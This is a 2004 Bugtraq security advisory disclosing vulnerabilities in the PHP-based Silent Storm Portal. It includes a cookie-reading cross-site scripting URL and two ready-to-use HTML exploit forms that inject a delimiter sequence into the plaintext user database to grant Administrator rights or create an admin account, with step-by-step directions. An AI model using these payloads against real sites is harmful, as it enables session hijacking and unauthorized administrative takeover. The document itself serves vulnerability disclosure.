[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple Vulnerabilities in Silent Storm Portal
From: R00tCr4ck <root () cyberspy ! org>
Date: 2004-09-30 11:57:54
Message-ID: 20040930115754.15459.qmail () www ! securityfocus ! com
[Download RAW message or body]
#####################################
# CHT Security Research-2004 #
# http://www.CyberSpy.Org #
# Turkey #
#####################################
Software:
Silent Storm Portal
Web Site:
http://www.silent-storm.co.uk/ssp/
Affected Version(s):
2.1,2.2
Description:
Silent Storm Portal is a PHP based portal system.It requires PHP4 or above.no MySQL \
needed.
Multiple Vulnerabilities in Silent Storm Portal:
Cross-Site Scripting vulnerability :
Silent Storm Portal is prone to cross-site scripting attacks. It is possible to \
construct a link containing arbitrary script code to a website running Silent Storm \
Portal . When a user browses the link, the script code will be executed on the user \
in the context of the site using the Portal.The impact of this issue is that the \
attacker is able to hijack a legitimate web user's session, by stealing cookie-based \
authentication credentials.
Demonstration:
http://www.victim.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
Unauthorized Administrative Access Vulnerability :
Silent Storm Portal stores all account informations,usernames and passwords in the \
users.dat file.This file is a plaintext file stored in the db directory.There is a \
flaw in profile.php file which could allow normal members to gain escalated \
privileges.The issue occurs due to insufficient sanitization of user-supplied data \
that may allow escape character sequences to be injected into the users.dat \
file.Submitting an e-mail address with an evil level code via profile module will \
inject Administrator level value into the database file and will escalate the current \
level to Administrator privileges.
Demonstration:
Register a user account then login and run the exploit.html
---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---
That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database file.
( 1: Administrator,2: is Normal User. )
examples from the database file:
before exploiting:
evilaccount<~>password<~>any@mail.com<~>2<~><~><~><~><~>
Level
Normal User
after exploiting:
evilaccount<~>password<~>any@mail.com<~>1<~><~>2<~><~><~><~><~><~><~>
Injected Level
Administrator
You'll get "Updated Your Profile Sucessfuly !" message after executing the \
exploit.html That's All! logout and re-login with your username/password.
click to "Admin Panel" link. ( index.php?module=../../apanel )
Now you have full Administrator privileges.
Here is another code that creates an Administrator account directly on the victim's \
portal:
---exploit2.html----
<form method="post" action="http://www.victim.com/index.php?module=../../Home">
User:<input type="text" name="usr" size="10"><br>
Pass:<input type="password" name="pas" size="10"><br>
<input type=hidden name="ema" value="any@mail.com<~>1<~>"><br>
<input type="submit" name="reg" value="Create Admin!">
</form>
---/exploit2.html---
----------------------------
The original article can be found at:
http://www.CyberSpy.Org
(Turkish Language)
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic